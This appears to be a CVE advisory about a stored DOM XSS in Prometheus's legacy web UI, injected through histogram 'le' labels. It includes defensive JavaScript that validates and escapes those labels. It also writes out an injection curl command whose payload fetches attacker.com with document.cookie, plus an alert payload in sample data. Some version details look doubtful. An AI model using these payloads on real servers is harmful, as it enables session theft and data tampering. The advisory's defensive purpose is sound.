Prometheus Legacy Web UI, Stored DOM XSS (Critical)


How this CVE works (CVE-2026-40179; the note describes a similar, newer XSS and uses the prior CVE as its reference):
The vulnerability resides in the legacy Prometheus web UI, enabled via `--enable-feature=old-ui`. In the histogram heatmap chart view, the `le` label values are not HTML-escaped before being inserted as axis tick mark labels. An attacker can inject crafted metrics whose `le` label carries a JavaScript payload (e.g., `<img src=x onerror=alert(1)>`). The injection can arrive through a compromised scrape target, the remote write receiver (`--web.enable-remote-write-receiver`), or the OTLP receiver (`--web.enable-otlp-receiver`). When a Prometheus administrator or user views the affected heatmap chart, the browser executes the payload. From the XSS context, the attacker can read `/api/v1/status/config` (secrets redacted, but the configuration is exposed), call `/-/quit` if `--web.enable-lifecycle` is set (shutdown), call `/api/v1/admin/tsdb/delete_series` if `--web.enable-admin-api` is set (data deletion), or exfiltrate metric data. The attack requires the legacy UI to be explicitly enabled.
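Two defender-side checks for the problem described above, as an added example that is not code from the Prometheus project: a histogram bucket's `le` label is always a float or `+Inf`, so any other value is a sign that something injected a label that does not belong there, and tick labels must be HTML-escaped before they are inserted into chart markup. The `series` input shape (an array of `{metric: {...}}` objects, as `/api/v1/series` returns) and the sample data are assumptions.

```javascript
// Added example, not Prometheus project code. Validates `le` label values
// and shows the unescaped tick-label rendering beside the escaped form.

// Matches the values Prometheus emits for `le`: a decimal number
// (optionally signed, optional exponent) or the literal +Inf.
const VALID_LE = /^(?:[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?|\+Inf)$/;

function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Returns the distinct `le` values that do not look like bucket bounds.
// `series` is shaped like the data field of an /api/v1/series response.
function findSuspiciousLe(series) {
  const bad = new Set();
  for (const s of series) {
    const le = s.metric && s.metric.le;
    if (le !== undefined && !VALID_LE.test(le)) bad.add(le);
  }
  return [...bad];
}

// Unsafe: label text goes into the markup verbatim (the bug the text describes).
function renderTickLabelsUnsafe(leValues) {
  return leValues.map((v) => `<text class="tick">${v}</text>`).join("");
}

// Safe: every label is escaped first, so markup inside a label stays inert text.
function renderTickLabels(leValues) {
  return leValues.map((v) => `<text class="tick">${escapeHtml(v)}</text>`).join("");
}

// Constructed sample (not real data), with the payload quoted in the
// advisory above as one of the label values.
const SAMPLE_SERIES = [
  { metric: { __name__: "http_request_duration_seconds_bucket", le: "0.5" } },
  { metric: { __name__: "http_request_duration_seconds_bucket", le: "+Inf" } },
  { metric: { __name__: "metric", le: "<img src=x onerror=alert(1)>" } },
];

console.log("suspicious le values:", findSuspiciousLe(SAMPLE_SERIES));
```

Running the check against a live instance means feeding it the `data` array from `/api/v1/series?match[]={le!=""}` instead of the constructed sample.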

dailycve form:

Platform: Prometheus
Version: <=0.311.2
Vulnerability: Stored DOM XSS
Severity: Critical
Date: 2026-05-05

Prediction: Patch 2026-05-06

What Undercode Say:

Check if legacy UI is enabled
grep --enable-feature=old-ui /etc/default/prometheus
Simulate malicious metric injection via remote write
curl -X POST http://victim:9090/api/v1/write -d 'metric{le="<img src=x onerror=fetch(\"https://attacker.com/?c=\"+document.cookie)>"} 1'
Verify XSS by viewing heatmap at /graph?g0.heatmap=1

Exploit:

Attacker sends crafted metric with payload in `le` label to any ingestion endpoint (scrape, remote write, OTLP). Victim views heatmap → JS executes → reads config, calls shutdown (if lifecycle enabled), deletes series (if admin API enabled), or exfiltrates data via external request.

Protection from this CVE:

  • Remove the `--enable-feature=old-ui` flag to disable the legacy UI.
  • Upgrade to Prometheus v0.311.3 or later.
  • If the legacy UI is required, restrict ingestion endpoints to trusted sources, disable `--web.enable-admin-api` and `--web.enable-lifecycle`, and avoid untrusted scrape targets.
  • Use CSP headers to mitigate XSS impact.

Impact:

Complete compromise of Prometheus web UI session. Attacker can leak configuration, shut down server (if lifecycle enabled), delete time series data (if admin API enabled), and exfiltrate all observed metrics. No direct remote code execution, but full administrative control over the Prometheus instance within browser context.


Sources:

Reported By: github.com